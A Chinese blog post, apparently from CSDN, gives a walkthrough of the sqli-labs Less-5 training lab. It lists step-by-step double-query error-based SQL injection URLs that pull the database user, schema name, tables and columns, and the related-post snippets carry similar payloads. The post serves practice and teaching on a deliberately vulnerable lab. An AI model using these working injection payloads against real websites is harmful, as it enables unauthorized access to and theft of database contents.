Sqli-labs Less-5 Double Query- Single Quotes- String

最新推荐文章于 2022-07-26 18:21:59 发布
最新推荐文章于 2022-07-26 18:21:59 发布
阅读量212 收藏
点赞数
分类专栏: sql注入学习 文章标签: mysql 信息安全 数据安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25500649/article/details/115719715
版权

首先弄一个id出来查看有什么显示出来。

显示上面的内容出来。

这个什么提示信息都没有,但是题目提示有双查询和单引号,那可以进行双查询注入。

/sql/Less-5/?id=1' union select 1,count(*),concat_ws(':',(select user()),floor(rand()*2)) as a from information_schema.tables group by a %23

用上面的payload 发送后发现,没有什么效果,和上面显示是一样的,可以试几次就可以得到下面的结果。

这样我们就获取到了数据库的用户,修改上面的payload就可以获取数据库名

/sql/Less-5/?id=1' union select 1,count(*),concat_ws(':',(select database()),floor(rand()*2)) as a from information_schema.tables group by a %23

在接下来数据库名有了就可以查询表名。

/sql/Less-5/?id=1' union select 1,count(*),concat_ws(':',(select table_name from information_schema.tables where table_schema='security'),floor(rand()*2)) as a from information_schema.tables group by a %23

这里返回子查询返回不止一行,因为上面没有用limit限制返回结果翻译出现了这个问题,我们可以继续使用limit限制返回结果一条一条的查看数据库中的字段,也可以使用聚合函数group_concat将返回结果聚合为一条结果。

这里先演示一下使用limit的情况

/sql/Less-5/?id=1' union select 1,count(*),concat_ws(':',(select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a %23

接下来演示一下,使用聚合函数的情况

/sql/Less-5/?id=1' union select 1,count(*),concat_ws(':',(select group_concat(table_name) from information_schema.tables where table_schema='security'),floor(rand()*2)) as a from information_schema.tables group by a %23

获取到数据表之后查询数据表的结构,也就是把数据表的字段名都查出来。

/sql/Less-5/?id=1' union select 1,count(*),concat_ws(':',(select group_concat(column_name) from information_schema.columns where table_name='emails'),floor(rand()*2)) as a from information_schema.tables group by a %23

结束。

 

 

 

Ushernrt
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
报错注入_sqli-labs less5 Double Query- Single Quotes- String
qq_51550750的博客
03-24 2816
sqli-labs less5 Double Query- Single Quotes- String ?id=1 无回显 考虑报错注入 (1)判断字符型还是数字型 http://39.101.162.123:10067/Less-5/?id=1%27%20and%201=%201–+ http://39.101.162.123:10067/Less-5/?id=1%27%20and%201=%202–+ 字符型而且是单引号闭合 (2)判断字段个数: http://39.101.162.123:100
SQLi-LabsLess-6 Double Query- Double Quotes- String
xw1995115的博客
11-15 903
本节实现原理和方法和Less-5基本一样,不同的是单引号变双引号,详见【SQLi-LabsLess-5 GET - Double Injection - Single Quotes - Stringhttps://blog.csdn.net/xw1995115/article/details/121329780?spm=1001.2014.3001.5501 本节复现下注入过程。 1.利用单引号尝试封闭查询语句,发现未报错 2. 利用双引号尝试封闭查询发现报错,因此为双引号封闭的查询语句 ...
Sqli-labs Less-6 Double Query- Double Quotes- String
04-19 79
打开题目一看,还是输入id,但是输入id一看,跟上一个题目类似什么也没有。 添加单引号测试。也没有任何反应。然后添加双引号测试终于报了错误出来。 看这个错误类型应该是,双引号闭合后 又多了一个双引号导致。 然后尝试报错注入。 /sql/Less-6/?id=1" and updatexml(1,concat(0x7e,database(),0x7e),1)%23 查出数据库名称。接下来查看数据表名称。 /sql/Less-6/?id=1" and updatexml(1,conc
sqli-labs-master第五关Less-5 Double Query- Single:方式一
weixin_34365417的博客
11-12 556
由于第三四关和第一第二关大致相同,我就不写了。 接下来来写第五关的第一种方式。 1,目标网站: http://127.0.0.1/sqli-labs-master/Less-5/?id=1 当传递的ID为1的时候提示“you are in” 2,查找注入点: http://127.0.0.1/sqli-labs-master/Le...
PageHelper分页只会作用于第一次查询,对第二次及以后的查询无效
LiZhen314的博客
07-26 3219
serviceImpl中进行多次查询。controller中使用分页。
elasticsearch对double的query_string搜索问题
2B铅笔水果橡皮
09-24 1881
querystring是强大的搜索方式,支持lucence语法。其默认搜索字段是_all。 现在秒
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-labs】 less59 GET -Challenge -Double Query -5 queries allowed -Variation2 (GET型 挑战 双查询 只允许5次查询 ...
ajxi63204的博客
01-31 107
整型的注入 http://192.168.136.128/sqli-labs-master/Less-59/?id=1 or UpdateXml(1,concat(0x7e,database(),0x7e),1)%23 转载于:https://www.cnblogs.com/omnis/p/8393874.html
sqli-labs】 less5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)...
ajxi63204的博客
01-19 439
双注入查询可以查看这两篇介绍 https://www.2cto.com/article/201302/190763.html https://www.2cto.com/article/201303/192718.html 简而言之就是构造如下的查询,会使得查询结果的一部分通过报错的形式显示出来 select count(*),concat((select version())...
sqli-lbs:Less-5~10通关详解
qq_45756971的博客
10-22 496
1.输入?id=2看见页面如下: 输入?id=666时,发现页面发生变化 说明页面没有显示位。无法使用联合查询注入 2.接着我们尝试在URL中输入 ?id=2’ 页面出现错误语句如下 但是可以发现存在注入点,这里可以闭合引号,随后通过查询列数发现这里也是3列 这道题使用的是报错注入 2.何为报错注入: 报错注入就是通过人为的引起数据库的报错,但是数据库在报错的同时会将查询的结果也呈现在报错中,我在这里介绍一下报错注入以及原理 这是网上使用最广泛的一句报错注入语句: select count(*),(fl
sqli-labs练习(五)------GET-Double injection-Single Quotes-String
wkend的博客
04-17 902
按提示,输入id参数1,得到回馈结果,但是没用 输入1',报错 查看报错信息near ''1'' LIMIT 0,1' at line 1 输入参数1'',没有报错, 通过以上过程可以发现,当我们改变参数的时候,回显只有两种结果 1>You are in........... 2> 报错信息 没办法,正确的查询只返回第一种情况,那么只能靠第二种回显结果了,...
SQLI-LAB  的 实战记录(Less 1 - Less 10)
这块盾牌有待改良
07-15 3302
Less - 1 Error Based- String Less - 2 Error Based- Intiger Less - 3 Error Based- String with Twist
sqli-labs less5 GET-double injections-single quote-string
weixin_30244889的博客
05-23 104
1、获取数据库名 id=-1' union select 1,2, count(*) from information_schema.tables group by concat_ws('-',(select database()),floor(rand(0)*2))--+ 2、获取security的表 id=-1' union select 1,2,count(*) from...
sqli-lab教程——1-35通关
缘木之鱼
05-08 5733
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges)Less-1 GET - Error...
Sqlilabs Less 5-6 Double Injection
baynk的博客
02-22 601
Less 5 GET - Double Injection - Single Quotes - String 手工注入 传参后,发现没出现用户名和密码,出现的是You are in...........,奇了怪,先不管了,加个'试试,出现错误回显,near ''1'' LIMIT 0,1' at line 1,这个和之前出现的是一样,单引号闭合,属于字符型注入。 但是发现,即使构造sql语句也没...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值